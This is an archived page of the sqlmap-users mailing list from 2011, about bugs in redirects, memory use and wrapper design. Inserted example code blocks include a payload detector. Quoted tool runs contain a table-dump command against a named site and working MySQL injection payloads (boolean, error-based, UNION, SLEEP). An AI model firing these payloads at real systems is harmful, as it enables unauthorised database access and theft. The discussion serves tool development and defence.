sqlmap-users Mailing List for sqlmap (Page 108)
From: Valentin K. <zac...@gm...> - 2011-01-29 19:40:54

---------- Forwarded message ----------
From: Valentin Kurkov <zac...@gm...>
Date: 2011/1/29
Subject: Re: [sqlmap-users] sqlmap and follow redirections sql-inj
To: "Bernardo Damele A. G." <ber...@gm...>

update sqlmap from svn upto revision 3127, but now sqlmap don't detect a sql-inj, even only with -u "http://url.com/test.php?id=1". And, *Of course, no following redirection((*

2011/1/28 Bernardo Damele A. G. <ber...@gm...>

> Svn update and try with latest version. Http redirects should be well
> supported now.
>
> Bernardo Damele A. G.
>
> This message was sent from a smartphone
>
> On 28 Jan 2011, at 17:59, Valentin Kurkov <zac...@gm...> wrote:
>
> > i have an 0.8 version, but don't find no info about following redirection
> > on the page for union based sql (else - just blind sql). Maybe in future
> > releases this functions will be add?)

From: Miroslav S. <mir...@gm...> - 2011-01-28 23:06:54

Hi David.

I've made a little testing and couldn't reproduce this one. 100,000 rows with 100 columns (integer numbers from 0-99) and still no crashing (30MB long session file).

Also, I've tried to make a really large array, but still nothing. OS went unresponsive, but couldn't get "MemoryError".

Could you try to run it on some other system? Also, is there anything else interesting about this "large" data retrieval?

KR

On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote:
> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6"
> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3
> -D nomes -T class --dump
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 16:58:05
>
> [16:58:05] [DEBUG] cleaning up configuration parameters
> [16:58:05] [DEBUG] setting the HTTP timeout
> [16:58:05] [DEBUG] setting the HTTP Cookie header
> [16:58:05] [DEBUG] setting the HTTP method to POST
> [16:58:05] [DEBUG] creating HTTP requests opener object
> [16:58:05] [INFO] using
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
> [16:58:05] [INFO] resuming injection data from session file
> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [16:58:05] [INFO] testing connection to the target url
> you provided an HTTP Cookie header value. The target url provided its own
> Cookie within the HTTP Set-Cookie header. Do you want to continue using the
> HTTP Cookie values that you provided? [Y/n]
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: vulnparam
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: vulnparam=6 AND 5647=5647
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1
> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a)
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 4 to 7 columns
> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR),
> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: vulnparam=6 AND SLEEP(5)
> ---
>
> [16:58:06] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.3.2
> back-end DBMS: MySQL 5.0
> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
> [16:58:06] [INFO] read from file
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM
> nomes.class#
> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>
> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text and
> any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: posix
> Traceback (most recent call last):
> File "./sqlmap.py", line 83, in main
> start()
> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in
> start
> action()
> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in
> dumpTable
> entries = inject.getValue(query, blind=False, dump=True)
> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
> value = __goInband(query, expected, sort, resumeValue, unpack, dump)
> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
> data = parseUnionPage(output, expression, partial, None, sort)
> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in
> parseUnionPage
> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url,
> kb.injection.place, conf.parameters[kb.injection.place], expression,
> logOutput))
> MemoryError
>
> [*] shutting down at: 17:00:13
>
> There are about 50,350 entries in the table and 48 columns. I tested the
> query manually, and returned a page with 600k of information. I think that
> sqlmap did not support the amount of data...?
>
> David

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

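The traceback quoted above raises `MemoryError` on the statement that formats the whole session record with `%` before handing it to `dataToSessionFile()`, which creates another full-size copy of the page output. The following is an added example, not sqlmap code and not from this thread: the function names and the sample fields are constructed, and it writes the same record in bounded chunks while `tracemalloc` compares the peak allocations of both approaches.

```python
import hashlib
import os
import tempfile
import tracemalloc

CHUNK = 64 * 1024  # characters per write; bounds the size of any temporary copy


def write_record_formatted(fp, fields):
    """Pattern from the traceback: format the whole record, then write it."""
    fp.write("[%s][%s][%s][%s][%s]\n" % tuple(fields))


def write_record_streamed(fp, fields, chunk=CHUNK):
    """Same record on disk, written piecewise so no field is copied whole."""
    for field in fields:
        fp.write("[")
        for start in range(0, len(field), chunk):
            fp.write(field[start:start + chunk])
        fp.write("]")
    fp.write("\n")


def measure(writer, fields):
    """Return (peak bytes allocated during the write, sha256 of the file)."""
    fd, path = tempfile.mkstemp(suffix=".session")
    os.close(fd)
    try:
        with open(path, "w", encoding="utf-8") as fp:
            tracemalloc.start()
            try:
                writer(fp, fields)
                fp.flush()
                peak = tracemalloc.get_traced_memory()[1]
            finally:
                tracemalloc.stop()
        digest = hashlib.sha256()
        with open(path, "rb") as fp:
            for block in iter(lambda: fp.read(1 << 20), b""):
                digest.update(block)
        return peak, digest.hexdigest()
    finally:
        os.remove(path)


def compare(output_size=4 * 1024 * 1024):
    """Write one constructed record both ways and report the peaks."""
    # Constructed stand-ins for the URL, injection place, parameters,
    # expression and UNION page output; this is not real sqlmap data.
    row = "x" * 99 + "\n"
    fields = [
        "http://target.example/page.php",
        "POST",
        "param=1",
        "SELECT col FROM db.tbl",
        row * (output_size // len(row)),
    ]
    formatted_peak, formatted_digest = measure(write_record_formatted, fields)
    streamed_peak, streamed_digest = measure(write_record_streamed, fields)
    return {
        "formatted_peak": formatted_peak,
        "streamed_peak": streamed_peak,
        "identical_file": formatted_digest == streamed_digest,
    }


if __name__ == "__main__":
    result = compare()
    print("formatted peak: %d bytes" % result["formatted_peak"])
    print("streamed peak:  %d bytes" % result["streamed_peak"])
    print("identical file: %s" % result["identical_file"])
```

The page output itself still has to fit in memory; chunked writing only removes the extra full-size copies made while the record is formatted and encoded.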
From: Miroslav S. <mir...@gm...> - 2011-01-28 21:55:49

you can also make a dirty hack on your side. hint:

>>> import sys
>>> import urllib2
>>> sys.modules['urllib2']
<module 'urllib2' from '...'>
>>> import os
>>> sys.modules['urllib2'] = os
>>> import urllib2
>>> dir(urllib2)
['F_OK', 'O_APPEND', 'O_BINARY', 'O_CREAT', 'O_EXCL', 'O_NOINHERIT', 'O_RANDOM', 'O_RDONLY', 'O_RDWR', 'O_SEQUENTIAL', 'O_SHORT_LIVED', 'O_TEMPORARY', 'O_TEXT', 'O_TRUNC', 'O_WRONLY', 'P_DETACH', 'P_NOWAIT', 'P_NOWAITO', 'P_OVERLAY', 'P_WAI ...

kr

On Fri, Jan 28, 2011 at 10:51 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Andreas.
>
> On Fri, Jan 28, 2011 at 6:55 PM, Andres Riancho
> <and...@gm...> wrote:
>> Miroslav,
>>
>> On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> Hi.
>>>
>>> I would suggest you to research "lib\core\testing.py" (liveTest()
>>> together with auxiliary methods). It was not updated for quite long
>>> time, but it should be useful for starters. It's meant for our
>>> internal testing (smoke testing for dummy checking via module loading
>>> and live testing against our VMs).
>>
>> Cool, I'll take a look at that. Something else I'm thinking about
>> is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a
>> urllib2 wrapper, and when a w3af user sets proxy settings and stuff he
>> expects that to be applied "system-wide", affecting sqlmap. Is there
>
> switch --ignore-proxy can be used to ignore "system-wide" proxy
> setting, while the default behavior is to use "system-wide" proxy, so
> sqlmap is quite smart in this field.
>
>> any easy way to modify sqlmap to use our
>> HTTP_request_sender_object.GET() ?
> well, no easy way out of box. we haven't "meant" this kind of things :)
>
> as it would require us to make a "dirty hack" on our side, i would
> suggest you guys to play around a bit and if you have some suggestions
> from your side (avoiding word "dirty" on our side) feel free to tell.
>
> kr
>>
>> Regards,
>>
>>> KR
>>>
>>> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho
>>> <and...@gm...> wrote:
>>>> Guys,
>>>>
>>>> What's the best way to create a sqlmap wrapper?
>>>>
>>>> In the w3af project we have a very old version of sqlmap
>>>> integrated as an attack plugin [0]. Right now we're doing something
>>>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
>>>> version we include is very old, I would like to update it to the
>>>> latest trunk version. My objective is to build something that's
>>>> extensible and will allow me to update w3af's sqlmap frequently
>>>> without any (if possible) effort. In order to do that, I need to write
>>>> a decent wrapper that will not depend on the changes in sqlmap's
>>>> implementation.
>>>>
>>>> Ideas?
>>>>
>>>> Regards,
>>>>
>>>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

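The `sys.modules` substitution hinted at in the message above, as an added example that is not part of the original post or of sqlmap or w3af. It is written for Python 3, where `urllib2` no longer exists, so the module name `legacy_http`, the `HostSender` class and `third_party_fetch()` are hypothetical stand-ins for `urllib2`, the host framework's request sender and the embedded tool's request code.

```python
import sys
import types
from contextlib import contextmanager


class HostSender:
    """Hypothetical stand-in for the host framework's HTTP sender object."""

    def __init__(self, proxy=None):
        self.proxy = proxy
        self.log = []  # every request that went through the host framework

    def GET(self, url):
        self.log.append(("GET", url, self.proxy))
        # Constructed response; a real sender would perform the request here.
        return "response for %s via %s" % (url, self.proxy or "direct")


def build_shim(sender, name="legacy_http"):
    """Build a module object exposing only the call the embedded tool uses."""
    shim = types.ModuleType(name)

    def urlopen(url, data=None, timeout=None):
        if data is not None:
            raise NotImplementedError("this example shim only covers GET")
        return sender.GET(url)

    shim.urlopen = urlopen
    return shim


@contextmanager
def substituted_module(name, replacement):
    """Make `import name` return `replacement`, restoring the old entry after."""
    missing = object()
    previous = sys.modules.get(name, missing)
    sys.modules[name] = replacement
    try:
        yield replacement
    finally:
        if previous is missing:
            sys.modules.pop(name, None)
        else:
            sys.modules[name] = previous


def third_party_fetch(url):
    """Stand-in for embedded tool code that imports its HTTP library itself."""
    import legacy_http  # resolved through sys.modules each time this runs
    return legacy_http.urlopen(url)


def demo():
    """Route the embedded code's request through the host sender."""
    sender = HostSender(proxy="http://127.0.0.1:8080")
    with substituted_module("legacy_http", build_shim(sender)):
        body = third_party_fetch("http://target.example/item?id=1")
    return body, sender.log, "legacy_http" in sys.modules


def early_vs_late():
    """Show that a name bound before the swap keeps the original module."""
    original = build_shim(HostSender(proxy=None))
    proxied = HostSender(proxy="http://127.0.0.1:8080")
    with substituted_module("legacy_http", original):
        import legacy_http as early  # behaves like a module-level import
        with substituted_module("legacy_http", build_shim(proxied)):
            late = third_party_fetch("http://target.example/a")
            stale = early.urlopen("http://target.example/b")
    return late, stale, len(proxied.log)


if __name__ == "__main__":
    print(demo())
    print(early_vs_late())
```

Code that bound the module before the substitution keeps the original object, which is why `stale` bypasses the proxy; the swap has to happen before the embedded tool is first imported.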
From: Miroslav S. <mir...@gm...> - 2011-01-28 21:51:32

hi Andreas.

On Fri, Jan 28, 2011 at 6:55 PM, Andres Riancho <and...@gm...> wrote:
> Miroslav,
>
> On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar
> <mir...@gm...> wrote:
>> Hi.
>>
>> I would suggest you to research "lib\core\testing.py" (liveTest()
>> together with auxiliary methods). It was not updated for quite long
>> time, but it should be useful for starters. It's meant for our
>> internal testing (smoke testing for dummy checking via module loading
>> and live testing against our VMs).
>
> Cool, I'll take a look at that. Something else I'm thinking about
> is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a
> urllib2 wrapper, and when a w3af user sets proxy settings and stuff he
> expects that to be applied "system-wide", affecting sqlmap. Is there

switch --ignore-proxy can be used to ignore "system-wide" proxy setting, while the default behavior is to use "system-wide" proxy, so sqlmap is quite smart in this field.

> any easy way to modify sqlmap to use our
> HTTP_request_sender_object.GET() ?

well, no easy way out of box. we haven't "meant" this kind of things :)

as it would require us to make a "dirty hack" on our side, i would suggest you guys to play around a bit and if you have some suggestions from your side (avoiding word "dirty" on our side) feel free to tell.

kr

>
> Regards,
>
>> KR
>>
>> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho
>> <and...@gm...> wrote:
>>> Guys,
>>>
>>> What's the best way to create a sqlmap wrapper?
>>>
>>> In the w3af project we have a very old version of sqlmap
>>> integrated as an attack plugin [0]. Right now we're doing something
>>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
>>> version we include is very old, I would like to update it to the
>>> latest trunk version. My objective is to build something that's
>>> extensible and will allow me to update w3af's sqlmap frequently
>>> without any (if possible) effort. In order to do that, I need to write
>>> a decent wrapper that will not depend on the changes in sqlmap's
>>> implementation.
>>>
>>> Ideas?
>>>
>>> Regards,
>>>
>>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

From: Bernardo D. A. G. <ber...@gm...> - 2011-01-28 18:22:40

Svn update and try with latest version. Http redirects should be well supported now.

Bernardo Damele A. G.

This message was sent from a smartphone

On 28 Jan 2011, at 17:59, Valentin Kurkov <zac...@gm...> wrote:

> i have an 0.8 version, but don't find no info about following redirection on the page for union based sql (else - just blind sql). Maybe in future releases this functions will be add?)

From: Valentin K. <zac...@gm...> - 2011-01-28 17:59:25

i have an 0.8 version, but don't find no info about following redirection on the page for union based sql (else - just blind sql). Maybe in future releases this functions will be add?)

From: Andres R. <and...@gm...> - 2011-01-28 17:56:02

Miroslav,

On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> I would suggest you to research "lib\core\testing.py" (liveTest()
> together with auxiliary methods). It was not updated for quite long
> time, but it should be useful for starters. It's meant for our
> internal testing (smoke testing for dummy checking via module loading
> and live testing against our VMs).

Cool, I'll take a look at that. Something else I'm thinking about is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a urllib2 wrapper, and when a w3af user sets proxy settings and stuff he expects that to be applied "system-wide", affecting sqlmap. Is there any easy way to modify sqlmap to use our HTTP_request_sender_object.GET() ?

Regards,

> KR
>
> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho
> <and...@gm...> wrote:
>> Guys,
>>
>> What's the best way to create a sqlmap wrapper?
>>
>> In the w3af project we have a very old version of sqlmap
>> integrated as an attack plugin [0]. Right now we're doing something
>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
>> version we include is very old, I would like to update it to the
>> latest trunk version. My objective is to build something that's
>> extensible and will allow me to update w3af's sqlmap frequently
>> without any (if possible) effort. In order to do that, I need to write
>> a decent wrapper that will not depend on the changes in sqlmap's
>> implementation.
>>
>> Ideas?
>>
>> Regards,
>>
>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)

--
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af

From: Miroslav S. <mir...@gm...> - 2011-01-28 16:06:57

good suggestion. for this one: r3125

kr

On Fri, Jan 28, 2011 at 4:57 PM, <bu...@gm...> wrote:
> On 01/28/2011 02:31 PM, Miroslav Stampar wrote:
>> Bug has been found and fixed :)
>
> Would be nice if you could include the revision number for such
> announcements. This would render them more useful if one stumbles on
> such an email via an archive search.
> thanks!

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

From: <bu...@gm...> - 2011-01-28 15:58:27

On 01/28/2011 02:31 PM, Miroslav Stampar wrote:
> Bug has been found and fixed :)

Would be nice if you could include the revision number for such announcements. This would render them more useful if one stumbles on such an email via an archive search.

thanks!

From: Miroslav S. <mir...@gm...> - 2011-01-28 15:15:22

are you also getting this with --flush-session?

On Fri, Jan 28, 2011 at 3:43 PM, yonny mutai <yo...@go...> wrote:
> 17:41:07] [INFO] read from file
> '/pentest/database/sqlmap/output/192.168.200.203/session':
> [17:41:08] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
>
> [17:41:30] [INFO] read from file
> '/pentest/database/sqlmap/output/192.168.200.203/session':
> [17:41:30] [INFO] retrieved:
> [17:41:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text and
> any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev (r3125)
> Python version: 2.6.5
> Operating system: posix
> Traceback (most recent call last):
> File "./sqlmap.py", line 83, in main
> start()
> File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in
> start
> action()
> File "/pentest/database/sqlmap/lib/controller/action.py", line 106, in
> action
> conf.dbmsHandler.dumpAll()
> File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1405,
> in dumpAll
> kb.data.cachedTables = self.getTables()
> File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 821,
> in getTables
> for db, table in value:
> ValueError: need more than 1 value to unpack
> [*] shutting down at: 17:41:37

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

From: Miroslav S. <mir...@gm...> - 2011-01-28 15:12:55

yes, Bernardo warned me about this yesterday night :)

we'll try to find something

kr

On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> wrote:
> --start and --stop are not working
>
> Sqlmap just ignore these parameter. i think when used with union injection
> technique, these parameters are ignored(??). tried with --start 1 and --stop
> 20.
>
>
> On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar
> <mir...@gm...> wrote:
>>
>> in the mean time you can try to use these:
>>
>> --start=LIMITSTART First query output entry to retrieve
>> --stop=LIMITSTOP Last query output entry to retrieve
>>
>> kr
>>
>> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html
>> >
>> > "A MemoryError exception is a built-in Python exception "Raised when an
>> > operation runs out of memory but the situation may still be rescued
>> > (by deleting some objects)."
>> >
>> > How many members does this list have? According to the FAQ, the largest
>> > list reported to date has 147,000 members and presumably works.
>> > Possibly something in the cPanel implementation or your particular
>> > installation limits this to a greater degree."
>> >
>> > now, this messes our concept a bit but we'll try to adapt.
>> >
>> > kr
>> >
>> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar
>> > <mir...@gm...> wrote:
>> >> LOL (50,350 entries in the table and 48 columns)
>> >>
>> >> we'll try to make some tests regarding this and report accordingly.
>> >> haven't planned this kind of "huge" data retrievals :)
>> >>
>> >> kr
>> >>
>> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...>
>> >> wrote:
>> >>> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6"
>> >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3
>> >>> -D nomes -T class --dump
>> >>>
>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> >>> http://sqlmap.sourceforge.net
>> >>>
>> >>> [*] starting at: 16:58:05
>> >>>
>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters
>> >>> [16:58:05] [DEBUG] setting the HTTP timeout
>> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header
>> >>> [16:58:05] [DEBUG] setting the HTTP method to POST
>> >>> [16:58:05] [DEBUG] creating HTTP requests opener object
>> >>> [16:58:05] [INFO] using
>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
>> >>> [16:58:05] [INFO] resuming injection data from session file
>> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
>> >>> [16:58:05] [INFO] testing connection to the target url
>> >>> you provided an HTTP Cookie header value. The target url provided its own
>> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using the
>> >>> HTTP Cookie values that you provided? [Y/n]
>> >>> sqlmap identified the following injection points with a total of 0 HTTP(s)
>> >>> requests:
>> >>> ---
>> >>> Place: POST
>> >>> Parameter: vulnparam
>> >>> Type: boolean-based blind
>> >>> Title: AND boolean-based blind - WHERE or HAVING clause
>> >>> Payload: vulnparam=6 AND 5647=5647
>> >>>
>> >>> Type: error-based
>> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT
>> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1
>> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM
>> >>> information_schema.tables GROUP BY x)a)
>> >>>
>> >>> Type: UNION query
>> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns
>> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL,
>> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR),
>> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>> >>>
>> >>> Type: AND/OR time-based blind
>> >>> Title: MySQL > 5.0.11 AND time-based blind
>> >>> Payload: vulnparam=6 AND SLEEP(5)
>> >>> ---
>> >>>
>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL
>> >>>
>> >>> web application technology: PHP 5.3.2
>> >>> back-end DBMS: MySQL 5.0
>> >>> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
>> >>> [16:58:06] [INFO] read from file
>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
>> >>> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
>> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL,
>> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM
>> >>> nomes.class#
>> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>> >>>
>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>> >>> with the latest development version from the Subversion repository. If the
>> >>> exception persists, please send by e-mail to
>> >>> sql...@li... the command line, the following text and
>> >>> any information needed to reproduce the bug. The developers will try to
>> >>> reproduce the bug, fix it accordingly and get back to you.
>> >>> sqlmap version: 0.9-dev
>> >>> Python version: 2.6.5
>> >>> Operating system: posix
>> >>> Traceback (most recent call last):
>> >>> File "./sqlmap.py", line 83, in main
>> >>> start()
>> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in
>> >>> start
>> >>> action()
>> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
>> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
>> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in
>> >>> dumpTable
>> >>> entries = inject.getValue(query, blind=False, dump=True)
>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
>> >>> value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>> >>> data = parseUnionPage(output, expression, partial, None, sort)
>> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in
>> >>> parseUnionPage
>> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url,
>> >>> kb.injection.place, conf.parameters[kb.injection.place], expression,
>> >>> logOutput))
>> >>> MemoryError
>> >>>
>> >>> [*] shutting down at: 17:00:13
>> >>>
>> >>> There are about 50,350 entries in the table and 48 columns. I tested the
>> >>> query manually, and returned a page with 600k of information. I think that
>> >>> sqlmap did not support the amount of data...?
>> >>>
>> >>> David
>
> --
> David Gomes Guimarães

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

From: David G. <sk...@gm...> - 2011-01-28 15:03:17

--start and --stop are not working

Sqlmap just ignores these parameters. I think when used with union injection technique, these parameters are ignored(??). Tried with --start 1 and --stop 20.

On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar <mir...@gm...> wrote:
> in the meantime you can try to use these:
>
> --start=LIMITSTART  First query output entry to retrieve
> --stop=LIMITSTOP    Last query output entry to retrieve
>
> kr

--
David Gomes Guimarães
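A defender-side check built from the payloads in the sqlmap run quoted in this thread, as an added example that is not part of any post and is not sqlmap code: it flags the four payload shapes from that run in logged request parameters and decodes the `CHAR(58,...)` output delimiters, which differ between requests (`:ojp:`/`:ccm:` in one, `:enz:`/`:osz:` in another), so the rule matches their shape rather than fixed strings. The log line layout, timestamps, client address and function names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, quote

# Shapes taken from the payloads logged in the thread; matched case-insensitively.
UNION_RE = re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)
ERROR_RE = re.compile(r"FLOOR\(RAND\(0\)\*2\).*\bGROUP\s+BY\b", re.I | re.S)
SLEEP_RE = re.compile(r"\bSLEEP\(\d+\)", re.I)
BOOL_RE = re.compile(r"\bAND\s+(\d+)=\1\b", re.I)
# Output delimiter: CHAR(58,x,y,z,58), i.e. ':' + three characters + ':'.
DELIM_RE = re.compile(r"CHAR\((58(?:,\d+){3},58)\)", re.I)


def classify(value):
    """Return the injection techniques whose payload shape appears in value."""
    found = []
    if BOOL_RE.search(value):
        found.append("boolean-based")
    if ERROR_RE.search(value):
        found.append("error-based")
    if SLEEP_RE.search(value):
        found.append("time-based")
    if UNION_RE.search(value):
        found.append("union-query")
    return found


def markers(value):
    """Decode every CHAR(58,x,y,z,58) delimiter in value to its text form."""
    decoded = []
    for match in DELIM_RE.finditer(value):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(code < 128 for code in codes):  # ignore non-ASCII code points
            decoded.append("".join(chr(code) for code in codes))
    return decoded


def scan(lines):
    """Parse 'time client method path urlencoded-body' lines and report hits."""
    findings = []
    for line in lines:
        timestamp, client, method, path, body = line.split(" ", 4)
        for name, value in parse_qsl(body):  # URL-decodes each parameter
            techniques = classify(value)
            if techniques:
                findings.append({
                    "time": timestamp,
                    "client": client,
                    "path": path,
                    "parameter": name,
                    "techniques": techniques,
                    "markers": markers(value),
                })
    return findings


# Parameter values as they appear in the thread, preceded by one benign value.
PAGE_PAYLOADS = [
    "6",
    "6 AND 5647=5647",
    "6 AND SLEEP(5)",
    "6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),"
    "IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),"
    "CHAR(58,99,99,109,58)), NULL, NULL#",
    "6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),"
    "(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),"
    "FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)",
]

# Constructed audit-log lines: the POST body is stored URL-encoded.
SAMPLE_LOG = [
    "2011-01-27T16:58:0%d 203.0.113.7 POST /intranet/vulnphp.php vulnparam=%s"
    % (i, quote(payload))
    for i, payload in enumerate(PAGE_PAYLOADS)
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["client"], finding["parameter"],
              ",".join(finding["techniques"]), finding["markers"])
```

Grouping findings by client and decoded marker ties the requests of one tool run together even when the individual payloads differ.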
From: yonny m. <yo...@go...> - 2011-01-28 14:43:46

